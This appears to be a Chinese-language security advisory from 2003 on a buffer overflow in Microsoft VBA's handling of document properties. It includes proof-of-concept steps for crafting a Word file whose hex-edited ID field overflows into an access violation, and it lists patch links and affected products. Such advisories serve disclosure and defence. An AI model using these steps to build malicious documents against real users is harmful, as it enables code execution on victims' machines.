Visual Basic for Applications远程任意代码可执行漏洞发布时间:2003-09-02 更新时间:2003-09-02 严重程度:高 威胁程度:普通用户访问权限 错误类型:边界检查错误 利用方式:客户机模式 受影响系统 Microsoft Visual Basic for Applications SDK 5.0详细描述 Microsoft VBA是用于开发客户端桌面或者集成到已存在数据中的开发技术。 VBA在检查文档属性时缺少充分检查,可导致触发缓冲区溢出。攻击者构造一个特殊的文档,发送给攻击者打开,就可能以用户进程权限执行任意代码。 测试代码 1,打开Word。 2,插入对象。 3,选择"MSPropertyTreeCtl Class"(或者选择其他对象如ChoiceBox Class等)。 4,保存.doc文件 5,使用编辑器修改.doc文件: 5a,在doc文件找到如下字符串: ID="{1FE45957-2625-4B1E-ADEF-EC04B7F34CCF}" Document=ThisDocument/&H00000000 Name="Project" HelpContextID="0" VersionCompatible32="393222000" CMG="1E1C0125015D1B611B611B611B61" DPB="4B4954458046804680" GC="787A679868986867" 5b,更改“ID”数据: +0000 49 44 3D 22 7B 31 46 45 34 35 39 35 37 2D 32 36 ID="{1FE45957-26 +0010 32 35 2D 34 42 31 45 2D 41 44 45 46 2D 45 43 30 25-4B1E-ADEF-EC0 +0020 34 42 37 46 33 34 43 43 46 7D 22 0D 0A 44 6F 63 4B7F34CCF}"..Doc +0030 75 6D 65 6E 74 3D 54 68 69 73 44 6F 63 75 6D 65 ument=ThisDocume 为如下: +0000 49 44 3D 22 7B 61 61 61 61 61 61 61 61 61 61 61 ID="{aaaaaaaaaaa +0010 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa +0020 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa +0030 61 61 61 61 41 42 43 44 00 00 00 00 aaaaABCD.... 6,打开修改的doc文件会出现访问冲突。 解决方案 补丁下载: Microsoft Office 2000: http://microsoft.com/downloads/details.aspx?FamilyId=E2CCE199-9C4A-4EEC-A3EC-9F738017F275&displaylang=en Administrative update only: http://www.microsoft.com/office/ork/xp/journ/o2k0901a.htm Microsoft Office XP (including Publisher 2002): http://microsoft.com/downloads/details.aspx?FamilyId=6F1FC4B0-29E9-44E0-A33D-AD6B4B6A8FF4&displaylang=en Administrative update only: http://www.microsoft.com/office/ork/xp/journ/oxp1001a.htm Microsoft Project 2000: http://microsoft.com/downloads/details.aspx?FamilyId=E53A52E7-431D-4580-9733-B92A2B7BFD0D&displaylang=en Microsoft Project 2002: http://microsoft.com/downloads/details.aspx?FamilyId=525BDE0A-0028-488A-8209-6E07D4603CCB&displaylang=en Microsoft Visio 2002: http://microsoft.com/downloads/details.aspx?FamilyId=55944490-13C2-4043-BA2A-17AF02E9C73E&displaylang=en Microsoft VBA Patch: http://microsoft.com/downloads/details.aspx?FamilyId=DA1A7ABA-CD3D-458B-9729-AB9094C9BD3F&displaylang=en 如下应用程序调用VBA,必须安装Microsoft VBA补丁: Microsoft VBA 5.0 Microsoft VBA 6.0 Microsoft VBA 6.2 Microsoft VBA 6.3. Microsoft Access 97 Microsoft Excel 97 Microsoft PowerPoint 97 Microsoft Word 97 Microsoft Word 98(J) Microsoft Visio 2000 Microsoft Works Suite 2001 Microsoft Business Solutions Great Plains 7.5 Microsoft Business Solutions Dynamics 6.0 Microsoft Business Solutions Dynamics 7.0 Microsoft Business Solutions eEnterprise 6.0 Microsoft Business Solutions eEnterprise 7.0 Microsoft Business Solutions Solomon 4.5 Microsoft Business Solutions Solomon 5.0 Microsoft Business Solutions Solomon 5.5 Microsoft建议用户访问Office更新站点http://www.office.microsoft.com/ProductUpdates/default.aspx来检测和安装安全补丁。 相关信息 参考:http://marc.theaimsgroup.com/?l=bugtraq&m=106262077829157&w=2 |
